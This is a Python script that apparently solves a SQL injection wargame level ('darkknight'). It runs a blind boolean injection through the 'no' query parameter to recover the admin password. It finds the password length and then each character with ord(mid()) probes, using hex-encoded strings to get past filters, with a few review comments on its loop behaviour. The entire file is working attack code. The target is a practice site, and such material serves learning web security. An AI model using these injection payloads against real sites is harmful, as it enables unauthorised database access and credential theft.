import requests
# Endpoint of the training challenge this script talks to; every request goes here.
URL = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
# Placeholder: the caller's own session cookie value must be filled in before running,
# otherwise the server answers for an unauthenticated session and query() never sees TRUE_PHRASE.
PHPSESSID = 'MY_PHPSESSID'
# Marker text whose presence in the response body is the only "true" signal query() reports.
TRUE_PHRASE = 'Hello admin'
def query(payload):
    """Send *payload* as the ``no`` query parameter and report the page's answer.

    The GET request carries the session cookie taken from ``PHPSESSID``.
    The return value is the boolean ``TRUE_PHRASE in response body`` —
    the single bit of information every caller in this file relies on.
    """
    resp = requests.get(
        URL,
        params={'no': payload},
        cookies={'PHPSESSID': PHPSESSID},
    )
    return TRUE_PHRASE in resp.text
# 8
def find_pw_length():
    """Return the length of the ``admin`` row's ``pw`` column by counting upward.

    Starting at 1, each candidate length is placed in the boolean condition
    and ``query`` is asked whether the page answered true; the first length
    that does is printed and returned.  ``0x61646d696e`` is the hexadecimal
    encoding of the string ``admin``.

    NOTE(review): the loop has no upper bound — if the condition never becomes
    true (placeholder cookie still in place, a changed page, request failures
    surfacing as a non-matching body) it issues one request per iteration
    indefinitely.
    """
    pw_len = 1
    # query() returns a bool, so `is False` ends the loop on the first True answer.
    while query("0 or id like 0x61646d696e and length(pw) like {}".format(pw_len)) is False:
        pw_len += 1
    print('pw_len: {}'.format(pw_len))
    return pw_len
# 0b70ea1f
def find_pw():
    """Recover ``pw`` one character at a time and print the result.

    For every 1-based position up to ``find_pw_length()``, the ASCII codes
    0..127 are tried in order; the first code for which ``query`` reports
    true is appended to ``pw`` and the inner loop stops.  Nothing is
    returned — the value is only printed.

    NOTE(review): a position where no code in 0..127 answers true is skipped
    silently (the inner ``for`` has no ``else``), so the printed string can
    be shorter than the reported length with no warning.  Worst case is 128
    requests per position.
    """
    pw_len = find_pw_length()
    pw = ''
    for pos in range(1, pw_len + 1):
        for character in range(0, 128):
            # ord(mid(pw, pos, 1)) is the ASCII code of the pos-th character of pw.
            if query("0 or id like 0x61646d696e and ord(mid(pw,{},1)) like {}".format(pos, character)) is True:
                pw += chr(character)
                break
    print('pw: {}'.format(pw))
# Module-level call: the whole search runs on import as well as when the file is executed directly.
find_pw()